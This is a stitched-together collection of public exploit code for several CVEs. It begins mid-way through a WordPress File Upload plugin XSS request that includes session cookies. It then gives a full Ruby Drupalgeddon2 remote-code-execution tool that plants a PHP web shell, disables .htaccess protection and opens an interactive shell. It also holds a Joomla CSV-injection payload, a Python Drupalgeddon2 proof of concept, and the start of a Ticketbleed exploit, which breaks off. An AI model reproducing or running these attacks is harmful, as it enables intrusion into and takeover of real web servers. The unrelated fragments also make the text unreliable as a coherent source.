3adeb337f313ef5156fbf93096c1af0cdbbc; wp-settings-1=libraryContent%3Dbrowse;
wp-settings-time-1=1522504284; PHPSESSID=o6smfv1u6p8rh7cu7v7gl9lm47;
wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_
ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7C1993c93121805782b8bee82cd013
6f1a6aa286d4294ed58cb6f95539acdfe5d5
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------27678165033834
Content-Disposition: form-data; name="_wpnonce"
c9d5733e36
-----------------------------27678165033834
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/options-general.php?page=wordpress_file_upload&
action=plugin_settings
-----------------------------27678165033834
Content-Disposition: form-data; name="action"
edit_settings
-----------------------------27678165033834
Content-Disposition: form-data; name="wfu_basedir"
<script>alert('XSS')</script>
-----------------------------27678165033834
Content-Disposition: form-data; name="wfu_postmethod"
fopen
-----------------------------27678165033834
Content-Disposition: form-data; name="wfu_admindomain"
siteurl
-----------------------------27678165033834
Content-Disposition: form-data; name="submitform"
Update
-----------------------------27678165033834--
Response:
HTTP/1.1 200 OK
Date: Thu, 05 Apr 2018 18:15:01 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28623
...
<input name="wfu_basedir" id="wfu_basedir" type="text"
value="<script>alert('XSS')</script>" />
<p style="cursor: text; font-size:9px; padding: 0px; margin: 0px; width:
95%; color: #AAAAAA;">Current value: <strong><script>alert('XSS')</
script></strong></p>
...
References
===============
https://www.iptanus.com/new-version-4-3-4-of-wordpress-file-upload-plugin/
https://wordpress.org/plugins/wp-file-upload/#developers
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9844
#!/usr/bin/env ruby
#
# [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
#
# Authors:
# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
#
require 'base64'
require 'json'
require 'net/http'
require 'openssl'
require 'readline'
require 'highline/import'
# Settings - Try to write a PHP to the web root?
try_phpshell = true
# Settings - General/Stealth
# NOTE(review): the literal User-Agent below is a ready-made detection
# signature; defenders can alert on it, and on the ajax_form=1 request paths
# this tool uses, in web-server and WAF logs.
$useragent = "drupalgeddon2"
# Artefact left on a compromised host when try_phpshell succeeds.
webshell = "shell.php"
# Settings - Proxy information (nil to disable)
$proxy_addr = nil
$proxy_port = 8080
# Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is 'better'!)
# The PHP webshell passes $_REQUEST['c'] to system(); it is base64-wrapped so
# it can be echoed through the OS shell (`echo <b64> | base64 -d` is also what
# shows up in process/command logs).
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
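# Function http_request <url> [type] [data]
# Sends one request through the global $http connection and returns the
# Net::HTTPResponse. `type` matching /get/ selects GET, anything else POST;
# `payload` becomes the body and `cookie` the Cookie header when non-empty.
# Connection problems (DNS, refused, timeout) are reported and the script
# exits, so callers never see nil.
def http_request(url, type="get", payload="", cookie="")
  puts verbose("HTTP - URL : #{url}") if $verbose
  puts verbose("HTTP - Type: #{type}") if $verbose
  puts verbose("HTTP - Data: #{payload}") if not payload.empty? and $verbose
  begin
    uri = URI(url)
    request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)
    # Set headers one at a time: initialize_http_header replaces the whole
    # header hash, so calling it a second time for the cookie silently
    # dropped the User-Agent that had just been set.
    request['User-Agent'] = $useragent
    request['Cookie'] = cookie if not cookie.empty?
    request.body = payload if not payload.empty?
    return $http.request(request)
  rescue SocketError
    puts error("Network connectivity issue")
  rescue Errno::ECONNREFUSED => e
    puts error("The target is down ~ #{e.message}")
    puts error("Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...") if $proxy_addr
  rescue Timeout::Error => e
    puts error("The target timed out ~ #{e.message}")
  end
  # If we got here, something went wrong.
  exit
end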
# Function gen_evil_url <cmd> [method] [shell] [phpfunction]
# Returns [url, payload] for the request that makes the Form API call
# `phpfunction` with `evil` as its argument. Which pair is built depends on
# the detected major version ($drupalverion) and on the form element
# (`element`) that carries the injected render callback. For Drupal 7 an
# extra round-trip fetches the form's form_build_id first, because the
# second request has to reference it. `shell` only silences the progress
# output (used from the interactive loop).
# The injected `#post_render` / `#lazy_builder` keys are what the
# SA-CORE-2018-002 fix strips from request input.
# NOTE(review): if no branch matches (e.g. an 8.x version with element
# "name"), url and payload stay nil and http_request fails on URI(nil).
def gen_evil_url(evil, element="", shell=false, phpfunction="passthru")
  puts info("Payload: #{evil}") if not shell
  puts verbose("Element : #{element}") if not shell and not element.empty? and $verbose
  puts verbose("PHP fn : #{phpfunction}") if not shell and $verbose
  # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render
  # Check the version to match the payload
  if $drupalverion.start_with?("8") and element == "mail"
    # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200
    url = $target + $clean_url + $form + "?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
    payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpfunction + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
  elsif $drupalverion.start_with?("8") and element == "timezone"
    # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru
    url = $target + $clean_url + $form + "?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
    payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=" + phpfunction + "&timezone[a][#lazy_builder][][]=" + evil
    #puts warning("WARNING: May benefit to use a PHP web shell") if not try_phpshell and phpfunction != "passthru"
  elsif $drupalverion.start_with?("7") and element == "name"
    # Method #3 - Drupal v7.x: name, #post_render - HTTP 200
    url = $target + "#{$clean_url}#{$form}&name[%23post_render][]=" + phpfunction + "&name[%23type]=markup&name[%23markup]=" + evil
    payload = "form_id=user_pass&_triggering_element_name=name"
  end
  # Drupal v7.x needs an extra value from a form
  if $drupalverion.start_with?("7")
    # First request: the injected URL above; its response carries the form_build_id.
    response = http_request(url, "post", payload, $session_cookie)
    form_name = "form_build_id"
    puts verbose("Form name : #{form_name}") if $verbose
    form_value = response.body.match(/input type="hidden" name="#{form_name}" value="(.*)"/).to_s.slice(/value="(.*)"/, 1).to_s.strip
    puts warning("WARNING: Didn't detect #{form_name}") if form_value.empty?
    puts verbose("Form value : #{form_value}") if $verbose
    # Second request goes to the file/ajax callback keyed by that id.
    url = $target + "#{$clean_url}file/ajax/name/%23value/" + form_value
    payload = "#{form_name}=#{form_value}"
  end
  return url, payload
end
# Function clean_result <input>
# Reduces a response body to the command output it wraps. Two wrappers are
# removed: the trailing Drupal AJAX command array
#   <payload>[{"command":"insert","method":"replaceWith",...}]
# that passthru output is embedded in, and everything from "The website
# encountered an unexpected error" onwards (Drupal v8.x #lazy_builder
# responses that come back as HTTP 500). Leading/trailing whitespace is
# stripped; nil input yields "".
def clean_result(input)
  ajax_trailer = /\[{"command":".*}\]$/
  error_page = /The website encountered an unexpected error.*/
  text = input.to_s.strip
  text = text.sub(ajax_trailer, "")
  text.sub(error_page, "")
end
# Feedback when something goes right
# Green "[+]" tag followed by text; colour is reset before the message.
def success(text)
  format("\e[%dm[+]\e[0m %s", 32, text)
end
# Feedback when something goes wrong
# Red "[-]" tag followed by text; colour is reset before the message.
def error(text)
  format("\e[%dm[-]\e[0m %s", 31, text)
end
# Feedback when something may have issues
# Yellow "[!]" tag followed by text; colour is reset before the message.
def warning(text)
  format("\e[%dm[!]\e[0m %s", 33, text)
end
# Feedback when something doing something
# Blue "[*]" tag followed by text; colour is reset before the message.
def action(text)
  format("\e[%dm[*]\e[0m %s", 34, text)
end
# Feedback with helpful information
# Light-blue "[i]" tag followed by text; colour is reset before the message.
def info(text)
  format("\e[%dm[i]\e[0m %s", 94, text)
end
# Feedback for the overkill
# Dark-grey "[v]" tag followed by text; colour is reset before the message.
def verbose(text)
  format("\e[%dm[v]\e[0m %s", 90, text)
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Prompts for the credentials and form details needed to log in before the
# rest of the script runs; the answers land in globals read by the login
# step. Username and password are read without echo. Returns the last
# answer (the credentials suffix).
def init_authentication()
  prompt = lambda do |question, echo|
    ask(question) { |q| q.echo = echo }
  end
  $uname = prompt.call('Enter your username: ', false)
  $passwd = prompt.call('Enter your password: ', false)
  $uname_field = prompt.call('Enter the name of the username form field: ', true)
  $passwd_field = prompt.call('Enter the name of the password form field: ', true)
  $login_path = prompt.call('Enter your login path (e.g., user/login): ', true)
  $creds_suffix = prompt.call('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...): ', true)
end
# True when `param` is one of the strings in `args` (compared with ==),
# false otherwise, including for an empty list.
def is_arg(args, param)
  args.include?(param)
end
# Quick how to use
# Prints the command-line synopsis plus one example per mode; returns nil.
def usage()
  puts [
    'Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]',
    'Example for target that does not require authentication:',
    ' ruby drupalgeddon2.rb https://example.com',
    'Example for target that does require authentication:',
    ' ruby drupalgeddon2.rb https://example.com --authentication',
  ]
end
# Read in values
# Command-line handling: the first argument is the target; --authentication
# prompts for credentials, --verbose turns on the [v] diagnostics.
if ARGV.empty?
  usage()
  exit
end
$target = ARGV[0]
init_authentication() if is_arg(ARGV, '--authentication')
$verbose = is_arg(ARGV, '--verbose')
# Check input for protocol
$target = "http://#{$target}" if not $target.start_with?("http")
# Check input for the end
$target += "/" if not $target.end_with?("/")
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Banner
# Banner: echo the effective settings so a run's log shows what was used.
puts action("--==[::#Drupalggedon2::]==--")
puts "-"*80
puts info("Target : #{$target}")
puts info("Proxy : #{$proxy_addr}:#{$proxy_port}") if $proxy_addr
puts info("Write? : Skipping writing PHP web shell") if not try_phpshell
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Setup connection
# Setup connection: one Net::HTTP object reused by every http_request call.
uri = URI($target)
$http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port)
# Use SSL/TLS if needed
if uri.scheme == "https"
  $http.use_ssl = true
  # Certificate validation is disabled, so an interposed TLS endpoint would
  # not be noticed by this client.
  $http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
$session_cookie = ''
# If authentication required then login and get session cookie
# ($uname is only set when init_authentication ran).
if $uname
  # NOTE(review): values are concatenated without URL-encoding; a username
  # or password containing '&' or '=' would corrupt the form body.
  $payload = $uname_field + '=' + $uname + '&' + $passwd_field + '=' + $passwd + $creds_suffix
  response = http_request($target + $login_path, 'post', $payload, $session_cookie)
  # Keep only the first cookie pair of the first Set-Cookie header.
  if (response.code == '200' or response.code == '303') and not response.body.empty? and response['set-cookie']
    $session_cookie = response['set-cookie'].split('; ')[0]
    puts success("Logged in - Session Cookie : #{$session_cookie}")
  end
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Try and get version
# Try and get version
# Version fingerprinting. $drupalverion ends up as either a full version
# ("7.57") or a major-only guess ("8.x"); the loop stops early on a full
# version. Each probe is a plain GET carrying the fixed User-Agent set
# above, which makes this phase straightforward to spot in web logs.
$drupalverion = ""
# Possible URLs
url = [
  # --- changelog ---
  # Drupal v6.x / v7.x [200]
  $target + "CHANGELOG.txt",
  # Drupal v8.x [200]
  $target + "core/CHANGELOG.txt",
  # --- bootstrap ---
  # Drupal v7.x / v6.x [403]
  $target + "includes/bootstrap.inc",
  # Drupal v8.x [403]
  $target + "core/includes/bootstrap.inc",
  # --- database ---
  # Drupal v7.x / v6.x [403]
  $target + "includes/database.inc",
  # Drupal v7.x [403]
  #$target + "includes/database/database.inc",
  # Drupal v8.x [403]
  #$target + "core/includes/database.inc",
  # --- landing page ---
  # Drupal v8.x / v7.x [200]
  $target,
]
# Check all
url.each do|uri|
  # Check response
  response = http_request(uri, 'get', '', $session_cookie)
  # Check header
  # X-Generator only gives the major version, hence the ".x" suffix.
  if response['X-Generator'] and $drupalverion.empty?
    header = response['X-Generator'].slice(/Drupal (.*) \(https:\/\/www.drupal.org\)/, 1).to_s.strip
    if not header.empty?
      $drupalverion = "#{header}.x" if $drupalverion.empty?
      puts success("Header : v#{header} [X-Generator]")
      puts verbose("X-Generator: #{response['X-Generator']}") if $verbose
    end
  end
  # Check request response, valid
  if response.code == "200"
    tmp = $verbose ? " [HTTP Size: #{response.size}]" : ""
    puts success("Found : #{uri} (HTTP Response: #{response.code})#{tmp}")
    # Check to see if it says: The requested URL "http://<URL>" was not found on this server.
    puts warning("WARNING: Could be a false-positive [1-1], as the file could be reported to be missing") if response.body.downcase.include? "was not found on this server"
    # Check to see if it says: <h1 class="js-quickedit-page-title title page-title">Page not found</h1> <div class="content">The requested page could not be found.</div>
    puts warning("WARNING: Could be a false-positive [1-2], as the file could be reported to be missing") if response.body.downcase.include? "the requested page could not be found"
    # Only works for CHANGELOG.txt
    if uri.match(/CHANGELOG.txt/)
      # Check if valid. Source ~ https://api.drupal.org/api/drupal/core%21CHANGELOG.txt/8.5.x // https://api.drupal.org/api/drupal/CHANGELOG.txt/7.x
      puts warning("WARNING: Unable to detect keyword 'drupal.org'") if not response.body.downcase.include? "drupal.org"
      # Patched already? (For Drupal v8.4.x / v7.x)
      # NOTE(review): #{url} interpolates the whole URL array; `uri` is the file being checked.
      puts warning("WARNING: Might be patched! Found SA-CORE-2018-002: #{url}") if response.body.include? "SA-CORE-2018-002"
      # Try and get version from the file contents (For Drupal v8.4.x / v7.x)
      $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
      # Blank if not valid
      $drupalverion = "" if not $drupalverion[-1] =~ /\d/
    end
    # Check meta tag
    if not response.body.empty?
      # For Drupal v8.x / v7.x
      meta = response.body.match(/<meta name="Generator" content="Drupal (.*) /)
      metatag = meta.to_s.slice(/meta name="Generator" content="Drupal (.*) \(http/, 1).to_s.strip
      if not metatag.empty?
        $drupalverion = "#{metatag}.x" if $drupalverion.empty?
        puts success("Metatag: v#{$drupalverion} [Generator]")
        puts verbose(meta.to_s) if $verbose
      end
    end
    # Done! ...if a full known version, else keep going... may get lucky later!
    break if not $drupalverion.end_with?("x") and not $drupalverion.empty?
  end
  # Check request response, not allowed
  # A 403 on a known file path is itself a hint about the layout (major version).
  if response.code == "403" and $drupalverion.empty?
    tmp = $verbose ? " [HTTP Size: #{response.size}]" : ""
    puts success("Found : #{uri} (HTTP Response: #{response.code})#{tmp}")
    if $drupalverion.empty?
      # Try and get version from the URL (For Drupal v.7.x/v6.x)
      $drupalverion = uri.match(/includes\/database.inc/)? "7.x/6.x" : "" if $drupalverion.empty?
      # Try and get version from the URL (For Drupal v8.x)
      $drupalverion = uri.match(/core/)? "8.x" : "" if $drupalverion.empty?
      # If we got something, show it!
      puts success("URL : v#{$drupalverion}?") if not $drupalverion.empty?
    end
  else
    tmp = $verbose ? " [HTTP Size: #{response.size}]" : ""
    puts warning("MISSING: #{uri} (HTTP Response: #{response.code})#{tmp}")
  end
end
# Feedback
# "?" marks a major-only guess, "!" a full version read from CHANGELOG.txt.
if not $drupalverion.empty?
  status = $drupalverion.end_with?("x")? "?" : "!"
  puts success("Drupal#{status}: v#{$drupalverion}")
else
  puts error("Didn't detect Drupal version")
  exit
end
if not $drupalverion.start_with?("8") and not $drupalverion.start_with?("7")
  puts error("Unsupported Drupal version (#{$drupalverion})")
  exit
end
puts "-"*80
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# The attack vector to use
# The attack vector to use
# Pre-flight checks: the target form must be reachable, and for v8.x clean
# URLs must be enabled because the AJAX request path depends on them.
$form = $drupalverion.start_with?("8")? "user/register" : "user/password"
# Make a request, check for form
url = "#{$target}?q=#{$form}"
puts action("Testing: Form (#{$form})")
response = http_request(url, 'get', '', $session_cookie)
if response.code == "200" and not response.body.empty?
  puts success("Result : Form valid")
elsif response['location']
  puts error("Target is NOT exploitable [5] (HTTP Response: #{response.code})... Could try following the redirect: #{response['location']}")
  exit
elsif response.code == "404"
  puts error("Target is NOT exploitable [4] (HTTP Response: #{response.code})... Form disabled?")
  exit
elsif response.code == "403"
  puts error("Target is NOT exploitable [3] (HTTP Response: #{response.code})... Form blocked?")
  exit
elsif response.body.empty?
  puts error("Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response")
  exit
else
  puts warning("WARNING: Target may NOT exploitable [1] (HTTP Response: #{response.code})")
end
puts "- "*40
# Make a request, check for clean URLs status ~ Enabled: /user/register Disabled: /?q=user/register
# Drupal v7.x needs it anyway
# $clean_url is the path prefix gen_evil_url inserts before $form.
$clean_url = $drupalverion.start_with?("8")? "" : "?q="
url = "#{$target}#{$form}"
puts action("Testing: Clean URLs")
response = http_request(url, 'get', '', $session_cookie)
if response.code == "200" and not response.body.empty?
  puts success("Result : Clean URLs enabled")
else
  $clean_url = "?q="
  puts warning("Result : Clean URLs disabled (HTTP Response: #{response.code})")
  puts verbose("response.body: #{response.body}") if $verbose
  # Drupal v8.x needs it to be enabled
  if $drupalverion.start_with?("8")
    puts error("Sorry dave... Required for Drupal v8.x... So... NOPE NOPE NOPE")
    exit
  elsif $drupalverion.start_with?("7")
    puts info("Isn't an issue for Drupal v7.x")
  end
end
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Values in gen_evil_url for Drupal v8.x
# Values in gen_evil_url for Drupal v8.x
# Execution check: each candidate element is tried with `echo <random>`;
# finding the random token in the response is taken as proof of execution
# and $element keeps the method that worked for the rest of the run.
elementsv8 = [
  "mail",
  "timezone",
]
# Values in gen_evil_url for Drupal v7.x
elementsv7 = [
  "name",
]
elements = $drupalverion.start_with?("8") ? elementsv8 : elementsv7
elements.each do|e|
  $element = e
  # Make a request, testing code execution
  puts action("Testing: Code Execution (Method: #{$element})")
  # Generate a random string to see if we can echo it
  # Eight upper-case letters, so a chance match in a normal page is unlikely.
  random = (0...8).map { (65 + rand(26)).chr }.join
  url, payload = gen_evil_url("echo #{random}", e)
  response = http_request(url, "post", payload, $session_cookie)
  # 500 is accepted because the timezone/#lazy_builder method returns it.
  if (response.code == "200" or response.code == "500") and not response.body.empty?
    result = clean_result(response.body)
    if not result.empty?
      puts success("Result : #{result}")
      if response.body.match(/#{random}/)
        puts success("Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!")
        break
      else
        puts warning("WARNING: Target MIGHT be exploitable [4]... Detected output, but didn't MATCH expected result")
      end
    else
      puts warning("WARNING: Target MIGHT be exploitable [3] (HTTP Response: #{response.code})... Didn't detect any INJECTED output (disabled PHP function?)")
    end
    puts warning("WARNING: Target MIGHT be exploitable [5]... Blind attack?") if response.code == "500"
    puts verbose("response.body: #{response.body}") if $verbose
    puts verbose("clean_result: #{result}") if not result.empty? and $verbose
  elsif response.body.empty?
    puts error("Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response")
    exit
  else
    puts error("Target is NOT exploitable [1] (HTTP Response: #{response.code})")
    puts verbose("response.body: #{response.body}") if $verbose
    exit
  end
  puts "- "*40 if e != elements.last
end
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Location of web shell & used to signal if using PHP shell
# Location of web shell & used to signal if using PHP shell
# Web-shell stage (only when try_phpshell). Each candidate directory is
# first probed for an existing shell.php, then the encoded PHP is written
# there with tee, and the result is verified by requesting it back.
# Artefacts this stage leaves behind: the shell file itself and, for
# sites/default/files/, a renamed .htaccess-bak next to it.
webshellpath = ""
prompt = "drupalgeddon2"
# Possibles paths to try
paths = [
  # Web root
  "",
  # Required for setup
  "sites/default/",
  "sites/default/files/",
  # They did something "wrong", chmod -R 0777 .
  #"core/",
]
# Check all (if doing web shell)
paths.each do|path|
  # Check to see if there is already a file there
  puts action("Testing: Existing file (#{$target}#{path}#{webshell})")
  response = http_request("#{$target}#{path}#{webshell}", 'get', '', $session_cookie)
  if response.code == "200"
    puts warning("Response: HTTP #{response.code} // Size: #{response.size}. ***Something could already be there?***")
  else
    puts info("Response: HTTP #{response.code} // Size: #{response.size}")
  end
  puts "- "*40
  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  folder = path.empty? ? "./" : path
  puts action("Testing: Writing To Web Root (#{folder})")
  # Merge locations
  webshellpath = "#{path}#{webshell}"
  # Final command to execute
  cmd = "#{bashcmd} | tee #{webshellpath}"
  # By default, Drupal v7.x disables the PHP engine using: ./sites/default/files/.htaccess
  # ...however, Drupal v8.x disables the PHP engine using: ./.htaccess
  if path == "sites/default/files/"
    puts action("Moving : ./sites/default/files/.htaccess")
    cmd = "mv -f #{path}.htaccess #{path}.htaccess-bak; #{cmd}"
  end
  # Generate evil URLs
  url, payload = gen_evil_url(cmd, $element)
  # Make the request
  response = http_request(url, "post", payload, $session_cookie)
  # Check result
  if response.code == "200" and not response.body.empty?
    # Feedback
    result = clean_result(response.body)
    puts success("Result : #{result}") if not result.empty?
    # Test to see if backdoor is there (if we managed to write it)
    response = http_request("#{$target}#{webshellpath}", "post", "c=hostname", $session_cookie)
    if response.code == "200" and not response.body.empty?
      puts success("Very Good News Everyone! Wrote to the web root! Waayheeeey!!!")
      break
    elsif response.code == "404"
      puts warning("Target is NOT exploitable [2-4] (HTTP Response: #{response.code})... Might not have write access?")
    elsif response.code == "403"
      puts warning("Target is NOT exploitable [2-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?")
    elsif response.body.empty?
      puts warning("Target is NOT exploitable [2-2] (HTTP Response: #{response.code})... Got an empty response back")
    else
      puts warning("Target is NOT exploitable [2-1] (HTTP Response: #{response.code})")
      puts verbose("response.body: #{response.body}") if $verbose
    end
  elsif response.code == "500" and not response.body.empty?
    puts warning("Target MAY of been exploited... Bit of blind leading the blind")
    break
  elsif response.code == "404"
    puts warning("Target is NOT exploitable [1-4] (HTTP Response: #{response.code})... Might not have write access?")
  elsif response.code == "403"
    puts warning("Target is NOT exploitable [1-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?")
  elsif response.body.empty?
    puts warning("Target is NOT exploitable [1-2] (HTTP Response: #{response.code}))... Got an empty response back")
  else
    puts warning("Target is NOT exploitable [1-1] (HTTP Response: #{response.code})")
    puts verbose("response.body: #{response.body}") if $verbose
  end
  # Reset so a later failure does not leave a stale path set by this iteration.
  webshellpath = ""
  puts "- "*40 if path != paths.last
end if try_phpshell
# If a web path was set, we exploited using PHP!
# `response` here is whatever the last http_request in the loop returned.
if not webshellpath.empty?
  # Get hostname for the prompt
  prompt = response.body.to_s.strip if response.code == "200" and not response.body.empty?
  puts "-"*80
  puts info("Fake PHP shell: curl '#{$target}#{webshellpath}' -d 'c=hostname'")
# Should we be trying to call commands via PHP?
elsif try_phpshell
  puts warning("FAILED : Couldn't find a writeable web path")
  puts "-"*80
  puts action("Dropping back to direct OS commands")
end
# Stop any CTRL + C action ;)
# Stop any CTRL + C action ;)
# SIGINT is ignored from here on; the only way out of the loop is "exit".
trap("INT", "SIG_IGN")
# Forever loop
# Interactive loop: each line is sent either to the written PHP file (c=...)
# or, without one, as a fresh Form API request via gen_evil_url. Every
# command is a new HTTP request, so each one is a separate log entry.
loop do
  # Default value
  result = "~ERROR~"
  # Get input
  command = Readline.readline("#{prompt}>> ", true).to_s
  # Check input
  puts warning("WARNING: Detected an known bad character (>)") if command =~ />/
  # Exit
  break if command == "exit"
  # Blank link?
  next if command.empty?
  # If PHP web shell
  if not webshellpath.empty?
    # Send request
    result = http_request("#{$target}#{webshellpath}", "post", "c=#{command}", $session_cookie).body
  # Direct OS commands
  else
    url, payload = gen_evil_url(command, $element, true)
    response = http_request(url, "post", payload, $session_cookie)
    # Check result
    if not response.body.empty?
      result = clean_result(response.body)
    end
  end
  # Feedback
  puts result
end
# Exploit Title: Joomla Extension Convert Forms version 2.0.3 is vulnerable to Formula Injection (CSV Injection)
# Google Dork: N/A
# Date: 12-04-2018
################################
# Exploit Author: Jetty Sairam
################################
# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
# Affected Version: 2.03 and before
#Category: Plugins and Extensions
# Tested on: WiN7_x64
# CVE : CVE-2018-10063
1. Application Description:
Convert Forms provides a framework to build custom forms for Joomla users.
2. Technical Description:
Convert Forms version 2.0.3 is affected by a CSV injection vulnerability that can lead to remote command execution. A public user can inject commands as part of form fields; when a user with higher privilege exports the form data as CSV and opens the file on their machine, the command is executed.
3. Proof Of Concept:
Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
When a high-privileged user logs into the application, exports the form data as CSV and opens the file, the formula is executed and the calculator is launched on their machine.
4. Solution:
Upgrade to version 2.0.4
https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
5. Reference:
https://vel.joomla.org/resolved/2160-convert-forms-2-0-3-csv-injection
https://www.tassos.gr/blog/convert-forms-2-0-4-security-release
https://vel.joomla.org/articles/2140-introducing-csv-injection
#!/usr/bin/env python3
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
# The base URL is appended to directly, so it must end with '/'.
target = input('Enter target url (example: https://domain.ltd/): ')
# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https
#
# example:
# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# verify = False
proxies = {}
verify = True
# Single POST to the user/register AJAX endpoint with a #post_render callback
# (the SA-CORE-2018-002 issue); the command writes a marker file hello.txt.
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
r = requests.post(url, proxies=proxies, data=payload, verify=verify)
# Success is judged only by whether the marker file is now served (HTTP 200);
# the response `r` itself is not inspected.
check = requests.get(target + 'hello.txt')
if check.status_code != 200:
    sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')
# -*- coding: utf-8 -*-
#!/usr/bin/python
# Exploit Title: Ticketbleed
# Google Dork: n/a
# Date: Exploit: 02/13/17, Advisory Published: 02/09/17
# Exploit Author: @0x00string
# Vendor Homepage: https://f5.com/
# Software Link: https://support.f5.com/csp/article/K05121675
# Version: see software link for versions
# Tested on: F5 BIGIP 11.6
# CVE : CVE-2016-9244
# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)
import re, getopt, sys, socket
from struct import *
try:
from scapy_ssl_tls.ssl_tls import *
except ImportError:
from scapy.layers.ssl_tls import *
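def banner():
    """Write the tool banner to stdout.

    Uses sys.stdout.write instead of the Python 2 print statement so the
    function is valid on both Python 2 and 3; output is byte-identical
    (the banner text followed by one newline).
    """
    sys.stdout.write('''
lol ty filippo!
ty tintinweb!
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py
''' + "\n")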
def usage ():
    """Print the command-line help text and exit (raises SystemExit)."""
    lines = [
        "python script.py <args>",
        " -h, --help: Show this message",
        " -a, --rhost: Target IP address",
        " -b, --rport: Target port",
        "",
        "",
        "Examples:",
        "python script.py -a 10.10.10.10 -b 443",
        "python script.py --rhost 10.10.10.10 --rport 8443",
    ]
    print("\n".join(lines))
    exit()
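def pretty (t, m):
    """Print message m with a coloured, bold tag chosen by t.

    t: "+" (green), "-" (red), "*" (blue) or "!" (yellow); any other tag
       prints nothing.
    m: the message text.
    Compares with == rather than `is` (identity on string literals is not
    guaranteed) and writes via sys.stdout.write so it works on Python 2
    and 3 with identical output: "<tag>\\t<m>\\n".
    """
    colours = {"+": "32", "-": "31", "*": "34", "!": "33"}
    colour = colours.get(t)
    if colour is None:
        return
    sys.stdout.write("\x1b[" + colour + ";1m[" + t + "]\x1b[0m\t" + m + "\n")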
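def createDump (input):
    """Return a hex dump of input: 16 bytes per line, hex column padded to 56
    characters, then the ASCII column.

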